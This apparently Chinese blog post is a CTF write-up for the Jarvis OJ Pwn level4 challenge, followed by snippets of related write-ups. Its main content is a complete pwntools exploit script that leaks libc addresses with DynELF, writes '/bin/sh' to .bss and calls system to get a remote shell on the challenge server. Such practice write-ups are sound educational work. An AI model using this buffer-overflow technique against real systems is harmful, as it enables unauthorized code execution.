(Jarvis Oj)(Pwn) level4

最新推荐文章于 2025-10-15 11:43:37 发布
原创 最新推荐文章于 2025-10-15 11:43:37 发布 · 1.2k 阅读 · 0 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文介绍了在解决Jarvis Oj的Pwn level4时遇到的挑战,包括没有libc文件、无法直接找到system和/bin/sh字符串。通过学习并应用DynELF,成功找到system地址,并利用read函数将'bin/sh'写入.bss段,从而完成挑战。

(Jarvis Oj)(Pwn) level4

先看一下保护措施,没什么奇怪的地方。
这里写图片描述
这次并没有给libc的文件,开始通过泄露得到的__libc_start_main地址对照libc库,并没有成功。于是就学了一波DynELF,这个模块的原理还是不太清楚(玄学),以后来填。总之利用这个模块可以找到system的地址,但是找不到”/bin/sh”这个字符串位置,但是我们可以控制read函数,所以可以通过调用read函数,将”bin/sh”写入到.bss段中,于是所有条件都齐了,写得脚本。 

from pwn import *
conn=remote('pwn2.jarvisoj.com','9880')
#conn=process('./level4')
e=ELF('./level4')
pad=0x88
write_plt=e.symbols['write']
vul_addr=0x804844b
bss_addr=0x0804a024
def leak(address):
    payload1='a'*pad+"BBBB"+p32(write_plt)+p32(vul_addr)+p32(1)+p32(address)+p32(4)
    conn.sendline(payload1)
    data=conn.recv(4)
    return data 
d=DynELF(leak,elf=e)
system_addr=d.lookup('system','libc')
print hex(system_addr)
read_plt=e.symbols['read']
payload2='a'*pad+"BBBB"+p32(read_plt)+p32(vul_addr)+p32(0)+p32(bss_addr)+p32(8)
conn.sendline(payload2)
conn.send("/bin/sh\x00")
payload3="a"*pad+"BBBB"+p32(system_addr)+'dead'+p32(bss_addr)
conn.sendline(payload3)
conn.interactive()
JarvisOJ——病毒数据分析
40KO的博客
03-07 547
0x00前言 这是一道恶意代码分析的题目,其实特征不太像病毒啦。。。整个流程分析下来,还是有不少收获,虽然最后卡在了某个点,但程序的所有功能和流程都分析完成了(因为不复杂,T__T)。在这里,我就把它当作真正的恶意程序来分析一番。 0x01信息收集 一开始我们没有必要直接去逆向这个程序,而是先收集相关信息,这样能够更轻松的完成逆向分析的步骤。 0.首先将它丢进沙箱 可以看到给出的评估...
jarvisoj_level4--buuctf
2301_81060697的博客
04-21 1218
基础泄露libc打不通,直接高级rop方法dl_runtime_resolve拿下这道题
CTF比赛PWN题解题思路()
最新发布
logic1001的博客
10-15 836
共同研发的的网安视频教程,内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。程序最终的判断是v7和v5相等即可得到shell,v7是程序里的,v5是我们的输入,然后这里data可以输入0xc0个字节,这里可以覆盖v7的地址空间。但是溢出后的返回地址,程序里面并没有明显的shell,但是有bin/sh字符串和system函数可以利用。因此本题的解题思路是输入data,覆盖掉v7,然后输入已知的数据,获得shell。
jarvis OJ
CHOOOU的博客
11-05 1045
basic Baby’s Crack 程序大概就是打开一个命令行输入的 file,然后打开一个 tmp,对 file 加密写入 tmp,将 file 删除,将 tmp 重命名为 file。 直接在 ida 中 F5,关键的代码就是: while (feof(*(_QWORD *)&argc, argv, v8, v16) == 0)
buuctf之jarvisoj_level0
weixin_54452942的博客
03-28 1885
64(system_addr+1)的奥秘
Jarvis OJ 【REVERSE】 Smali
qq_26779635的博客
12-01 1201
题目:都说学好Smali是学习Android逆向的基础,现在刚好有一个smali文件,大家一起分析一下吧~~ 链接:Crackme.smali.36e0f9d764bb17e86d3d0acd49786a18 之前接触过点smali,看下文件就是smali,本来想找smali转java工具,但看了下smali发现几个函数名能推出东西,如下 然后结合smali语法花点时间看了...
(Jarvis Oj)(Pwn) level1
Nothing
04-18 1402
(Jarvis Oj)(Pwn) level1 首先用checksec查一下保护。几乎没开什么保护措施。关键的是NX没开,意味着栈上的数据可执行。 用ida反汇编,找到溢出点。 但这次没有找到system函数了,那么该怎么得到shell呢,发现这个函数调用了printf函数,输出了buf的地址,在结合NX保护是关闭的,那么就意味着,如果将shellcode写到buf中,函数返回时跳转...
(Jarvis Oj)(Pwn) level0
Nothing
04-17 1311
(Jarvis Oj)(Pwn) level0 首先用checksec查一下保护。几乎没开什么保护措施。 用ida反汇编。main函数就调用了两个函数。 跟进第二个函数。 找到溢出点,同过buf缓冲区。又找到函数callsystem()。 只要控制程序返回到callsystem地址即可。找到callsystem地址。 写得脚本。 1 from pwn ...
(Jarvis Oj)(Pwn) level2
Nothing
04-19 1191
(Jarvis Oj)(Pwn) level2 首先用checksec查一下保护。这次NX开启了。 用ida反汇编,找到溢出点。 这次system函数又出现了。于是想着是否可以通过控制调用system(“/bin/sh”)得到shell,将返回地址用system的地址覆盖,将传入参数设置成”/bin/sh”,用ida查找了一下字符串,刚好发现了”/bin/sh”,于是记录下地址(或者...
(Jarvis Oj)(Pwn) level3_x64
Nothing
04-24 1066
(Jarvis Oj)(Pwn) level3_x64 这题是level3的64位版本,思路和32位版本一致,不同之处就是函数的参数传递,利用寄存器,于是构造rop链。写得脚本如下: from pwn import * ...
(Jarvis Oj)(Pwn) level2(x64)
Nothing
04-19 1552
(Jarvis Oj)(Pwn) level2(x64) 首先用checksec查一下保护,和level2一样。 反汇编,程序和32位的程序几乎一致。找到溢出点。 那么溢出思路也和32位的差不多,唯一不同的是,64位程序在调用system函数时,参数的传递方式和32位不一样,32位是通过栈传参,而64位通过edi寄存器传参,所以这时我们的思路变成如何覆盖edi的值,通过基本rop就可...
PWN(栈溢出漏洞)-原创小白超详细[Jarvis-level0]
qq_58166735的博客
11-06 1796
不同的系统,内存的构造不同,堆栈相关的寄存器操作主要是EBP和ESP寄存器,比作指针来说,ESP寄存器总是指向堆栈的栈顶,当执行PUSH命令向堆栈压入数据的时候,ESP减4,然后把数据拷贝到ESP指向的位置,执行POP命令的时候,首先把ESP指向的数据拷贝到内存/寄存器中,然后ESP+4,而堆栈在内存中的地址从高向低扩展,因此参数或者局部的变量总是通过EBP加减一定的偏移地址来访问的。在小端存储模式下 数据的最低有效字节会被存储在数据的最低地址处,最高有效字节反之。出栈,栈减少4byte。
(Jarvis Oj)(Pwn) level3
Nothing
04-24 1750
(Jarvis Oj)(Pwn) level3 首先用checksec查看一下保护。 依然开启了NX保护。ida反汇编,找到溢出点。 可是呢,这次在程序中并没有找到system函数,和”/bin/sh”字符串,那么这次该如何拿到shell呢,还是利用system函数,但是没有程序中system的plt,我们如何获取system的地址呢,这需要利用到在libc.so文件中各个函数的相对...
jarvisojpwnlevel系列wp
Huiuyao的博客
12-09 3006
由于最近攻防世界的动态环境又崩了,因此找到了jarvisoj这么个oj,网站地址如下 [jarvisoj](https://www.jarvisoj.com/) 其中会有rank与题目数,其中的pwn有个level系列网上还挺火的,因此就顺便做了一下,主要是解决一些可能新手不理解的部分。 ## level1 ...
攻防世界level0 + (Jarvis Oj)(Pwn) level1
qq_44832048的博客
07-24 2153
攻防世界level0 将文件在ida中打开, 输出字符串helloWord之后执行vulnerable_function()函数,没有与用户交互,双击进去查看,, 无参数传入,buf长度为0x80,即0x80h填充满,之后跟上地址就可以实现任意跳转。查找字符串 这是 vulnerable_function 函数,可以在栈上写0x200个字节,或许我们可以进行溢出,覆盖掉返回地址...
(Jarvis Oj)(Pwn) level5
Nothing
05-03 2192
(Jarvis Oj)(Pwn) level5 题目描述:mmap和mprotect练习,假设system和execve函数被禁用,请尝试使用mmap和mprotect完成本题。附件和level3_x64的附件一样。 首先去看看这个mmap函数和mprotect函数是干啥的。 void* mmap(void* addr, size_t len, int port, int flag, int...
笔记向——PWN jarvis oj level2
m0_52133692的博客
12-07 255
题目链接:https://dn.jarvisoj.com/challengefiles/level2.54931449c557d0551c4fc2a10f4778a1 nc pwn2.jarvisoj.com 9878 0x01分析漏洞 先查看文件类型,再运行一下文件 检查保护措施 补充: checksec :是用来检查可执行文件属性的。 Arch:说明这个文件的属性是什么,说明是32位的程序。 Stack:canary,这个主要是说栈保护的东西,所利用的东西就是相当于网站的cookie,lin
[Jarvis OJ - PWN]——[XMAN]level2(x64)
Y_peak的博客
02-03 882
[Jarvis OJ - PWN]——[XMAN]level2(x64) 题目地址:https://www.jarvisoj.com/challenges 题目: checksec一下,是64位程序。开启了NX保护 在IDA看一下,main函数中有我们要的system函数, vulnerable_function函数中也有。不过可惜参数都不对,任取一个system地址就好就好。但是我们找到了栈溢出的利用函数read。buf距离rbp的距离为0x80 查找一下看看有没有**"/bin/sh"字符串
Jarvis OJ - pwn level3
hanqdi_的博客
02-03 321
前言 因为换了电脑,GitHub博客的环境搭起来太麻烦了,又想有所记录,所以又回到这里啦~ level3 前段时间做过pwn题目,现在再来做,发现以前很简单的脚本利用命令都忘记了,真是,啥东西都不能放,一放就忘,这脑子不管用了。 之后每天保持做题量,保持做题手感!在这里记录并且作为监督自己的一种方式。 做题思路 没有system和binsh,又给出了libc文件,容易想到可以用ret2libc方法...
笔记向——PWN jarvis oj level1
m0_52133692的博客
12-07 201
题目链接:https://dn.jarvisoj.com/challengefiles/level1.80eacdcd51aca92af7749d96efad7fb5 nc pwn2.jarvisoj.com 9877 0x01Linux中分析题目 首先使用file命令,文件为32位 再运行一下文件,提示输入,然后输出hello world 若出现权限不够则使用 chmod 777 文件名 ,打开文件所有权限 使用gdb工具,终端输入gdb,再输入:checksec 文件名,检查保
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值